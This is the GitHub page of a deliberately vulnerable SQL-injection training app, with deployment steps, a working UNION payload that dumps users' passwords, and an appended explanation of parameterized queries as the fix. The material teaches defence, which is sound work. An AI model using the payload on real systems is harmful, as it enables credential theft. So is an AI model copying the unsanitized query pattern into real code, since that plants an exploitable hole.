Training for SQL injections
Type Name Latest commit message Commit time
_database First push Jan 15, 2019
_public Remove hard written port Feb 3, 2019
srcs Remove hard written port Feb 3, 2019
.gitignore First push Jan 15, 2019
Dockerfile First push Jan 15, 2019
README.md Fix typo Jan 19, 2019
docker-compose.yml Remove hard written port Feb 3, 2019
package.json First push Jan 15, 2019
screenshot.png First push Jan 15, 2019
yarn.lock First push Jan 15, 2019

README.md

SQLi Platform

This is a vulnerable web application built to help understand the basics of SQL injection.

The front end exposes a field allowing the user to search a database and retrieve names, nicknames, emails... The user's input is not sanitized, allowing an attacker to inject SQL code and leak passwords.

SQL queries are logged on the backend and are also shown on the front end, so that the attacker has a better understanding of what they are doing.

Screenshot

Deploy

You may run the application in Docker containers:

docker-compose up

You may edit docker-compose.yml to tweak the following settings:

  • MYSQL_ROOT_PASSWORD: Database password
  • SQL_HOST: Database host, from the API's point of view
  • SQL_WAIT: Time (in seconds) the API waits before connecting to the database

The application is then accessible on http://localhost:8080/.

Exploit

⚠️ Contains spoilers!
Here is an example of a working payload, exposing all passwords in the table:

nothing%" UNION SELECT pass, nickname, email FROM users#

Resulting in the following complete query:

SELECT id, nickname, email FROM users WHERE nickname LIKE "%nothing%" UNION SELECT pass, nickname, email FROM users#%"
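Why the payload changes the statement, and how a bound parameter prevents it, as an added example that is not code from this repository. It assumes the backend concatenates the search term into the query text, as the complete query above suggests; all function names are hypothetical.

```javascript
// Payload copied from the "Exploit" section of this page.
const PAGE_PAYLOAD = 'nothing%" UNION SELECT pass, nickname, email FROM users#';

// Assumed vulnerable pattern: the term is pasted into the SQL text, so a double
// quote in the input ends the string literal and the rest is parsed as SQL.
function buildConcatenatedQuery(term) {
  return 'SELECT id, nickname, email FROM users WHERE nickname LIKE "%' + term + '%"';
}

// Reduce a single-line MySQL statement to its code skeleton: the contents of
// double-quoted literals and anything after '#' are dropped.
function sqlSkeleton(sql) {
  let out = '';
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const c = sql[i];
    if (inString) {
      if (c === '\\') i++;                           // escaped char stays in the literal
      else if (c === '"' && sql[i + 1] === '"') i++; // doubled quote stays in the literal
      else if (c === '"') { inString = false; out += '"'; }
    } else if (c === '"') { inString = true; out += '"'; }
    else if (c === '#') break;                       // '#' comments out the rest of the line
    else out += c;
  }
  return out.trim();
}

// True when the input altered the statement itself rather than only the
// contents of the LIKE pattern.
function inputChangesStructure(term) {
  return sqlSkeleton(buildConcatenatedQuery(term)) !== sqlSkeleton(buildConcatenatedQuery(''));
}

// Hardened pattern: the SQL text is constant and the term travels as a bound
// value. LIKE wildcards are escaped with '!' so input cannot widen the pattern.
function buildParameterizedQuery(term) {
  const escaped = term.replace(/[!%_]/g, (c) => '!' + c);
  return {
    sql: "SELECT id, nickname, email FROM users WHERE nickname LIKE ? ESCAPE '!'",
    values: ['%' + escaped + '%'],
  };
}

console.log(sqlSkeleton(buildConcatenatedQuery(PAGE_PAYLOAD)));
console.log(inputChangesStructure(PAGE_PAYLOAD), inputChangesStructure('ali'));
console.log(buildParameterizedQuery(PAGE_PAYLOAD));
```

The `sql` and `values` pair is the shape a placeholder-based driver call takes (for instance `query(sql, values)` in the `mysql2` package); with it, the payload is only ever compared against nicknames as literal text.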